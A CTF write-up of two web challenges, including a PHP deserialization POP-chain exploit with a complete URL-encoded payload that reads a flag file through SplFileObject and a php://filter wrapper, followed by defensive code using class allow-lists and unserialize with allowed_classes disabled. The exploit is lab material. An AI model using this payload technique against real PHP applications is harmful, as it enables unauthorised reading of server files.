A newbie's first provincial competition

Web

Challenge 1: Checkin

Visit the page directly and capture the traffic with Burp to get the flag.

Challenge 2: pppop

Exploit for the POP chain:

<?php
class A1{
    public $tmp1;
    public $tmp2;
}
class A3{
}
class A4{
    public $tmp1;
}
class A6{
    public $tmp1;
}
class A8{
}
$a1 = new A1();
$a3 = new A3();
$a4 = new A4();
$a6 = new A6();
$a8 = new A8();
$a1->tmp1=$a3;
$a3->tmp2=$a4;
$a4->tmp1=$a6;
$a6->tmp1=$a8;
echo urlencode(serialize($a1));

At this point, echo new $this->tmp1($this->tmp2); is executed.

Use GlobIterator with a wildcard pattern to list the matching files.

The flag is in flaggggggggggg.php.

Read the file with SplFileObject plus a pseudo-protocol (php://filter stream wrapper).

?DASCTF=O%3A2%3A%22A1%22%3A2%3A%7Bs%3A4%3A%22tmp1%22%3BO%3A2%3A%22A3%22%3A1%3A%7Bs%3A4%3A%22tmp2%22%3BO%3A2%3A%22A4%22%3A1%3A%7Bs%3A4%3A%22tmp1%22%3BO%3A2%3A%22A6%22%3A1%3A%7Bs%3A4%3A%22tmp1%22%3BO%3A2%3A%22A8%22%3A0%3A%7B%7D%7D%7D%7Ds%3A4%3A%22tmp2%22%3BN%3B%7D&DAS=SplFileObject&CTF=php://filter/convert.base64-encode/resource=flaggggggggggg.php

Base64-decode the output to get the flag.
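The chain works because a serialized object from the DASCTF parameter reaches `new $this->tmp1($this->tmp2)` with a request-chosen class name and argument. As an added example (not the challenge's source; Report, ALLOWED_TYPES, build() and loadState() are hypothetical names, PHP 8.0+ assumed), the hardened form of both steps maps a request value to an allow-listed class and refuses objects during deserialization:

```php
<?php
declare(strict_types=1);

// Hypothetical application class, used only for this illustration.
final class Report
{
    public function __construct(public string $title) {}
    public function __toString(): string { return "Report: {$this->title}"; }
}

// Request-facing names mapped to the only classes that may be instantiated.
const ALLOWED_TYPES = ['report' => Report::class];

// Replaces `new $name($arg)`: the caller picks a key, never a class name.
function build(string $type, string $arg): object
{
    $class = ALLOWED_TYPES[$type] ?? null;
    if ($class === null) {
        throw new InvalidArgumentException("type not allowed: {$type}");
    }
    return new $class($arg);
}

// Deserializes plain data only. With allowed_classes => false every serialized
// object becomes __PHP_Incomplete_Class, so no application magic method runs.
function loadState(string $blob): array
{
    $data = unserialize($blob, ['allowed_classes' => false]);
    if (!is_array($data)) {
        throw new UnexpectedValueException('expected a serialized array');
    }
    array_walk_recursive($data, function ($value): void {
        if ($value instanceof __PHP_Incomplete_Class) {
            throw new UnexpectedValueException('serialized object rejected');
        }
    });
    return $data;
}

// Constructed sample inputs: one allowed call, two rejected ones, one plain array.
echo build('report', 'Q3'), PHP_EOL;
foreach ([fn() => build('SplFileObject', 'x'), fn() => loadState(serialize(new Report('x')))] as $attempt) {
    try {
        $attempt();
    } catch (Exception $e) {
        echo 'blocked: ', $e->getMessage(), PHP_EOL;
    }
}
var_dump(loadState(serialize(['user' => 'alice'])));
```

Where the stored state is only scalars and arrays, json_encode()/json_decode() removes the object-instantiation surface entirely.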

Q.E.D.